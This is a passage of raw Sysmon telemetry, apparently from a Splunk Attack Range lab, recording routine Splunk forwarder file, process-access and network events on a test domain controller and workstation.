Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CEB41828466DCCFD4F8F3BA5EA3E274,SHA256=1CBA147A0FA1F9E04AB72A606792CD26B4164D85C2D13C61AAA41C634889D9B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810219Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:48.584{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A77DD44AAA73B5283621B7F106CEB7C,SHA256=C00F4401B58E8892B8ACC06C6F2BB99E50FFEAA92244B24286B3F7C5D041FC12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054289Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:47.996{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF258D3A919A0DD651AE35428C8EAC59,SHA256=7AEAC9FADC6D5E622288D2AF33A92706210913C11FCA892E1CA91645935E54CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810220Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:49.631{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D516B4C70C31EC238F10DDFEB75B9F58,SHA256=D6B90F9B8BAB801F070D20594460BF181A5DA1F0D3272A96CDB5A64FCEDE27E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054290Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:49.029{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCF843791CA715453D739F3893303E4B,SHA256=F4A874A965A70D909F8226F67462B37841BABD23BD7D6E4A08E17CFAAABA0810,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810222Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:50.662{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26B26FBDF122647C0DBBA957F130ED79,SHA256=6BE72C045E4BB5AB668A11A0B575379150BC0F24BF3BE03C9B7032D380C25D04,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054309Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.911{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F81A-60EB-E97D-00000000CF01}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054308Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.911{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054307Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.911{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054306Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.895{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054305Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.895{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F81A-60EB-E97D-00000000CF01}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054304Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.895{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054303Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.895{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F81A-60EB-E97D-00000000CF01}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054302Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.896{466BC892-F81A-60EB-E97D-00000000CF01}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001054301Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.496{466BC892-F81A-60EB-E87D-00000000CF01}100328908C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054300Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.480{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-6E0B-00000000CF01}6608C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054299Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.248{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F81A-60EB-E87D-00000000CF01}10032C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054298Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.232{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054297Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.232{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054296Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.232{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054295Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.232{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054294Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.232{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F81A-60EB-E87D-00000000CF01}10032C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054293Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.232{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F81A-60EB-E87D-00000000CF01}10032C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054292Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.180{466BC892-F81A-60EB-E87D-00000000CF01}10032C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054291Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.049{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E410FF1023291E4C8D944ED159AEB5C5,SHA256=B7BCC45A8AD5DF99812B2A4A819BEE3E5466C664D477658CE18808C63E5E9AA3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810221Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:48.406{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57451-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810223Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:51.677{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2247F1517ED057B6A63F6A5C418B256,SHA256=94346C58DD4BE2C364F6EFC00AEAD492CB7DF76A12B25381211EB7D1F48DA1C2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054322Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:51.726{466BC892-F81B-60EB-EA7D-00000000CF01}95088848C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054321Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:51.495{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F81B-60EB-EA7D-00000000CF01}9508C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054320Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:51.495{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054319Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:51.495{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054318Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:51.495{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054317Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 